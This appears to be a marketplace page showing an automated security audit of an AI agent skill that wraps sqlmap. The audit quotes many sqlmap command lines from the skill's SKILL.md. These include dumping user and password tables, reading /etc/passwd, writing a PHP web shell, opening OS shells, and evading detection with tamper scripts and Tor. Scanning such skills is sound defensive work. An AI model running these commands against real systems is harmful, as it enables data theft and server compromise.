Skip to main content

webapp-sqlmap

Automates SQL injection detection and exploitation for web application security testing, ensuring vulnerabilities are identified and addressed.

Install this skill

or
9/100

Security score

The webapp-sqlmap skill was audited on Feb 28, 2026 and we found 73 security issues across 2 threat categories, including 1 high-severity. Review the findings below before installing.

Categories Tested

Security Issues

high line 194

Access to /etc/passwd

SourceSKILL.md
194sqlmap -u "http://example.com/page?id=1" --file-read="/etc/passwd"
medium line 270

Access to hidden dotfiles in home directory

SourceSKILL.md
270- **Logging**: All SQLMap activity is logged to ~/.sqlmap/output/
low line 17

External URL reference

SourceSKILL.md
17- https://sqlmap.org/
low line 18

External URL reference

SourceSKILL.md
18- https://owasp.org/www-community/attacks/SQL_Injection
low line 19

External URL reference

SourceSKILL.md
19- https://cwe.mitre.org/data/definitions/89.html
low line 36

External URL reference

SourceSKILL.md
36sqlmap -u "http://example.com/page?id=1"
low line 39

External URL reference

SourceSKILL.md
39sqlmap -u "http://example.com/login" --data="username=admin&password=test"
low line 45

External URL reference

SourceSKILL.md
45sqlmap -u "http://example.com/page?id=1" --dbs
low line 80

External URL reference

SourceSKILL.md
80sqlmap -u "http://example.com/product?id=1"
low line 83

External URL reference

SourceSKILL.md
83sqlmap -u "http://example.com/search?query=test&category=all&sort=name"
low line 86

External URL reference

SourceSKILL.md
86sqlmap -u "http://example.com/page?id=1&name=test" --level=5 --risk=3
low line 92

External URL reference

SourceSKILL.md
92sqlmap -u "http://example.com/login" --data="user=admin&pass=test"
low line 98

External URL reference

SourceSKILL.md
98sqlmap -u "http://example.com/api" --data='{"user":"admin"}' --headers="Content-Type: application/json"
low line 104

External URL reference

SourceSKILL.md
104sqlmap -u "http://example.com/" --cookie="sessionid=abc123; role=user"
low line 107

External URL reference

SourceSKILL.md
107sqlmap -u "http://example.com/" --headers="X-Forwarded-For: 1.1.1.1\nUser-Agent: Test"
low line 110

External URL reference

SourceSKILL.md
110sqlmap -u "http://example.com/" --cookie="sessionid=abc123*; role=user"
low line 119

External URL reference

SourceSKILL.md
119sqlmap -u "http://example.com/page?id=1"
low line 122

External URL reference

SourceSKILL.md
122sqlmap -u "http://example.com/page?id=1" --level=5 --risk=3
low line 125

External URL reference

SourceSKILL.md
125sqlmap -u "http://example.com/page?id=1" --technique=BEUSTQ
low line 128

External URL reference

SourceSKILL.md
128sqlmap -u "http://example.com/page?id=1" --fingerprint
low line 131

External URL reference

SourceSKILL.md
131sqlmap -u "http://example.com/page?id=1" --dbms=mysql
low line 148

External URL reference

SourceSKILL.md
148sqlmap -u "http://example.com/page?id=1" --dbs
low line 151

External URL reference

SourceSKILL.md
151sqlmap -u "http://example.com/page?id=1" --current-db
low line 154

External URL reference

SourceSKILL.md
154sqlmap -u "http://example.com/page?id=1" -D database_name --tables
low line 157

External URL reference

SourceSKILL.md
157sqlmap -u "http://example.com/page?id=1" -D database_name -T users --columns
low line 160

External URL reference

SourceSKILL.md
160sqlmap -u "http://example.com/page?id=1" --users
low line 163

External URL reference

SourceSKILL.md
163sqlmap -u "http://example.com/page?id=1" --privileges
low line 172

External URL reference

SourceSKILL.md
172sqlmap -u "http://example.com/page?id=1" -D database_name -T users --dump
low line 175

External URL reference

SourceSKILL.md
175sqlmap -u "http://example.com/page?id=1" -D database_name -T users -C username,password --dump
low line 178

External URL reference

SourceSKILL.md
178sqlmap -u "http://example.com/page?id=1" --dump-all
low line 181

External URL reference

SourceSKILL.md
181sqlmap -u "http://example.com/page?id=1" --dump-all --exclude-sysdbs
low line 184

External URL reference

SourceSKILL.md
184sqlmap -u "http://example.com/page?id=1" -D database_name --search -C password
low line 194

External URL reference

SourceSKILL.md
194sqlmap -u "http://example.com/page?id=1" --file-read="/etc/passwd"
low line 197

External URL reference

SourceSKILL.md
197sqlmap -u "http://example.com/page?id=1" --file-write="shell.php" --file-dest="/var/www/html/shell.php"
low line 203

External URL reference

SourceSKILL.md
203sqlmap -u "http://example.com/page?id=1" --os-cmd="whoami"
low line 206

External URL reference

SourceSKILL.md
206sqlmap -u "http://example.com/page?id=1" --os-shell
low line 209

External URL reference

SourceSKILL.md
209sqlmap -u "http://example.com/page?id=1" --sql-shell
low line 215

External URL reference

SourceSKILL.md
215sqlmap -u "http://example.com/login" --data="user=admin&pass=test" --auth-type=Basic
low line 218

External URL reference

SourceSKILL.md
218sqlmap -u "http://example.com/page?id=1" --auth-cred="admin:password"
low line 227

External URL reference

SourceSKILL.md
227sqlmap -u "http://example.com/page?id=1" --tamper=space2comment
low line 230

External URL reference

SourceSKILL.md
230sqlmap -u "http://example.com/page?id=1" --tamper=space2comment,between
low line 233

External URL reference

SourceSKILL.md
233sqlmap -u "http://example.com/page?id=1" --random-agent
low line 236

External URL reference

SourceSKILL.md
236sqlmap -u "http://example.com/page?id=1" --user-agent="Mozilla/5.0..."
low line 239

External URL reference

SourceSKILL.md
239sqlmap -u "http://example.com/page?id=1" --delay=2
low line 242

External URL reference

SourceSKILL.md
242sqlmap -u "http://example.com/page?id=1" --proxy="http://127.0.0.1:8080"
low line 245

External URL reference

SourceSKILL.md
245sqlmap -u "http://example.com/page?id=1" --tor --check-tor
low line 298

External URL reference

SourceSKILL.md
298sqlmap -u "http://example.com/page?id=1" --batch
low line 301

External URL reference

SourceSKILL.md
301sqlmap -u "http://example.com/page?id=1" --dbs --batch
low line 304

External URL reference

SourceSKILL.md
304sqlmap -u "http://example.com/page?id=1" --current-user --current-db --is-dba --batch
low line 311

External URL reference

SourceSKILL.md
311sqlmap -u "http://example.com/login" \
low line 318

External URL reference

SourceSKILL.md
318sqlmap -u "http://example.com/login" \
low line 328

External URL reference

SourceSKILL.md
328sqlmap -u "http://api.example.com/user/1" \
low line 334

External URL reference

SourceSKILL.md
334sqlmap -u "http://api.example.com/search" \
low line 344

External URL reference

SourceSKILL.md
344sqlmap -u "http://example.com/page?id=1" \
low line 368

External URL reference

SourceSKILL.md
368sqlmap -u "http://example.com/page?id=1" --proxy="http://127.0.0.1:8080"
low line 375

External URL reference

SourceSKILL.md
375sqlmap -u "http://example.com/page?id=1" -s output.sqlite
low line 378

External URL reference

SourceSKILL.md
378sqlmap -u "http://example.com/page?id=1" --resume
low line 381

External URL reference

SourceSKILL.md
381sqlmap -u "http://example.com/page?id=1" --output-dir="/path/to/results"
low line 384

External URL reference

SourceSKILL.md
384sqlmap -u "http://example.com/page?id=1" -v 3
low line 387

External URL reference

SourceSKILL.md
387sqlmap -u "http://example.com/page?id=1" -t traffic.log
low line 397

External URL reference

SourceSKILL.md
397sqlmap -u "http://example.com/page?id=1" --string="Welcome" --not-string="Error"
low line 400

External URL reference

SourceSKILL.md
400sqlmap -u "http://example.com/page?id=1" --technique=U
low line 403

External URL reference

SourceSKILL.md
403sqlmap -u "http://example.com/page?id=1" --sql-query="SELECT version()"
low line 411

External URL reference

SourceSKILL.md
411sqlmap -u "http://example.com/page?id=1" --tamper=space2comment,between --random-agent
low line 414

External URL reference

SourceSKILL.md
414sqlmap -u "http://example.com/page?id=1" --delay=3 --randomize
low line 417

External URL reference

SourceSKILL.md
417sqlmap -u "http://example.com/page?id=1" --method=PUT
low line 425

External URL reference

SourceSKILL.md
425sqlmap -u "http://example.com/page?id=1" --threads=5
low line 428

External URL reference

SourceSKILL.md
428sqlmap -u "http://example.com/page?id=1" --level=1 --risk=1
low line 431

External URL reference

SourceSKILL.md
431sqlmap -u "http://example.com/page?id=1&name=test" -p id
low line 460

External URL reference

SourceSKILL.md
460- [SQLMap Official Documentation](https://sqlmap.org/)
low line 461

External URL reference

SourceSKILL.md
461- [OWASP SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection)
low line 462

External URL reference

SourceSKILL.md
462- [CWE-89: SQL Injection](https://cwe.mitre.org/data/definitions/89.html)
low line 464

External URL reference

SourceSKILL.md
464- [PTES: Vulnerability Analysis](http://www.pentest-standard.org/index.php/Vulnerability_Analysis)
Scanned on Feb 28, 2026
View Security Dashboard
Installation guide →